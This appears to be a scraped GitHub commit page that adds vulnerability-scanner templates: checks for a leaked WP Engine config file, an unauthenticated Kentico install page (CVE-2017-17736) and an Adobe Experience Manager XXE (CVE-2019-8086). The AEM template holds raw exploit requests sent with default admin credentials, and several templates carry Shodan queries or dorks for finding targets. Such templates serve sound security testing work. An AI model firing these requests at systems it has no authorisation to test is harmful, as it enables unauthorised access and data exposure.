-
Notifications
You must be signed in to change notification settings - Fork 643
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
109 changed files
with
1,113 additions
and
150 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
id: wpeprivate_leak | ||
|
||
info: | ||
name: wpeprivate_leak | ||
author: 51pwn | ||
severity: critical | ||
description: | | ||
wpeprivate_leak | ||
metadata: | ||
tags: leak,config | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/_wpeprivate/config.json" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
- type: word | ||
part: body | ||
words: | ||
- '"VPENGINE_PHPSESSIONS":' | ||
|
||
|
||
# Enhanced by mp on 2022/09/29 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
id: CVE-2017-17736 | ||
|
||
info: | ||
name: Kentico - Unauthenticated Administration Dashboard | ||
author: shiar | ||
severity: critical | ||
description: | | ||
Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 allows remote attackers to obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard. | ||
reference: | ||
- https://www.exploit-db.com/ghdb/5694 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2017-17736 | ||
- https://blog.hivint.com/advisory-access-control-bypass-in-kentico-cms-cve-2017-17736-49e1e43ae55b | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2017-17736 | ||
cwe-id: CWE-425 | ||
metadata: | ||
google-dork: intitle:"kentico database setup" | ||
verified: "true" | ||
tags: cve,cve2017,kentico,cms,install,rce,unauth,edb | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/CMSInstall/install.aspx" | ||
|
||
matchers-condition: or | ||
matchers: | ||
- type: word | ||
words: | ||
- "Kentico" | ||
- "Database Setup" | ||
- "SQLServer" | ||
condition: and | ||
|
||
- type: word | ||
words: | ||
- "Database Setup" | ||
- "SQLServer" | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,53 @@ | ||
id: CVE-2019-8086 | ||
|
||
info: | ||
name: Adobe Experience Manager XXE | ||
author: DhiyaneshDk | ||
severity: high | ||
description: Adobe Experience Manager versions 6.5, 6.4, 6.3 and 6.2 have a xml external entity injection vulnerability. Successful exploitation could lead to sensitive information disclosure. | ||
reference: | ||
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 | ||
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py | ||
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 | ||
metadata: | ||
shodan-query: | ||
- http.title:"AEM Sign In" | ||
- http.component:"Adobe Experience Manager" | ||
tags: cve,cve2019,aem,adobe | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /content/{{randstr}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Authorization: Basic YWRtaW46YWRtaW4= | ||
Referer: {{BaseURL}} | ||
sling:resourceType=fd/af/components/guideContainer | ||
- | | ||
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Authorization: Basic YWRtaW46YWRtaW4= | ||
Referer: {{BaseURL}} | ||
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '<afData>ABC<afBoundData/>' | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- application/json | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.